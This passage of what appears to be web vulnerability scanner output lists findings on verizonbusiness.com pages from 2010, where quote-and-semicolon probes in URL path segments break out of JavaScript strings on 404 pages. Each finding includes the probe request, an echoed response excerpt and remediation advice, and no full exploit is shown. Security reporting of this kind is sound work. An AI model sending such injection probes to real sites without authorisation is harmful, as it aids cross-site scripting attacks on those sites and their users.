hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions5a2cd";5136ad7efc/infrastructure/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.959. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a8e3'%3ba22bf9760a3 was submitted in the REST URL parameter 3. This input was echoed as 8a8e3';a22bf9760a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/infrastructure8a8e3'%3ba22bf9760a3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43110
Date: Wed, 17 Nov 2010 00:36:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/infrastructure8a8e3';a22bf9760a3/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.960. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/infrastructure/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 572bd"%3bc9a4c109a19 was submitted in the REST URL parameter 3. This input was echoed as 572bd";c9a4c109a19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/infrastructure572bd"%3bc9a4c109a19/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:35:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43108
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/infrastructure572bd";c9a4c109a19/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.961. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b0e"%3b6e1f2fe6487 was submitted in the REST URL parameter 1. This input was echoed as 53b0e";6e1f2fe6487 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions53b0e"%3b6e1f2fe6487/bysolutions/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions53b0e";6e1f2fe6487/bysolutions/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.962. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0d63'%3b7600eab8397 was submitted in the REST URL parameter 1. This input was echoed as e0d63';7600eab8397 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse0d63'%3b7600eab8397/bysolutions/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutionse0d63';7600eab8397/bysolutions/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.963. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1150"%3b236bb1aebf6 was submitted in the REST URL parameter 2. This input was echoed as b1150";236bb1aebf6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsb1150"%3b236bb1aebf6/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsb1150";236bb1aebf6/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.964. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbfe7'%3b2c0a52b20df was submitted in the REST URL parameter 2. This input was echoed as bbfe7';2c0a52b20df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsbbfe7'%3b2c0a52b20df/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsbbfe7';2c0a52b20df/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.965. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbc64"%3b809b54e9aac was submitted in the REST URL parameter 3. This input was echoed as bbc64";809b54e9aac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/managedbbc64"%3b809b54e9aac/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:08 GMT
Content-Type: text/html
Content-Length: 43096
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/managedbbc64";809b54e9aac/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.966. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11dce'%3ba2da5b1f7f3 was submitted in the REST URL parameter 3. This input was echoed as 11dce';a2da5b1f7f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/managed11dce'%3ba2da5b1f7f3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:30 GMT
Content-Type: text/html
Content-Length: 43096
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/managed11dce';a2da5b1f7f3/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.967. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a29'%3b04e633b37b4 was submitted in the REST URL parameter 1. This input was echoed as 50a29';04e633b37b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions50a29'%3b04e633b37b4/bysolutions/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40664
Date: Wed, 17 Nov 2010 00:36:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions50a29';04e633b37b4/bysolutions/networking/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.968. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b954"%3bf9ed557ed46 was submitted in the REST URL parameter 1. This input was echoed as 8b954";f9ed557ed46 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions8b954"%3bf9ed557ed46/bysolutions/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:22 GMT
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions8b954";f9ed557ed46/bysolutions/networking/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.969. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb559'%3bdf7e3ddc66f was submitted in the REST URL parameter 2. This input was echoed as cb559';df7e3ddc66f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionscb559'%3bdf7e3ddc66f/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:12 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41876
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionscb559';df7e3ddc66f/networking/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.970. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c26"%3bd586c91dfc9 was submitted in the REST URL parameter 2. This input was echoed as 49c26";d586c91dfc9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions49c26"%3bd586c91dfc9/networking/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41878
Date: Wed, 17 Nov 2010 00:36:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions49c26";d586c91dfc9/networking/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.971. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/networking/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbd1d"%3bc1e63abf5fe was submitted in the REST URL parameter 3. This input was echoed as cbd1d";c1e63abf5fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/networkingcbd1d"%3bc1e63abf5fe/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
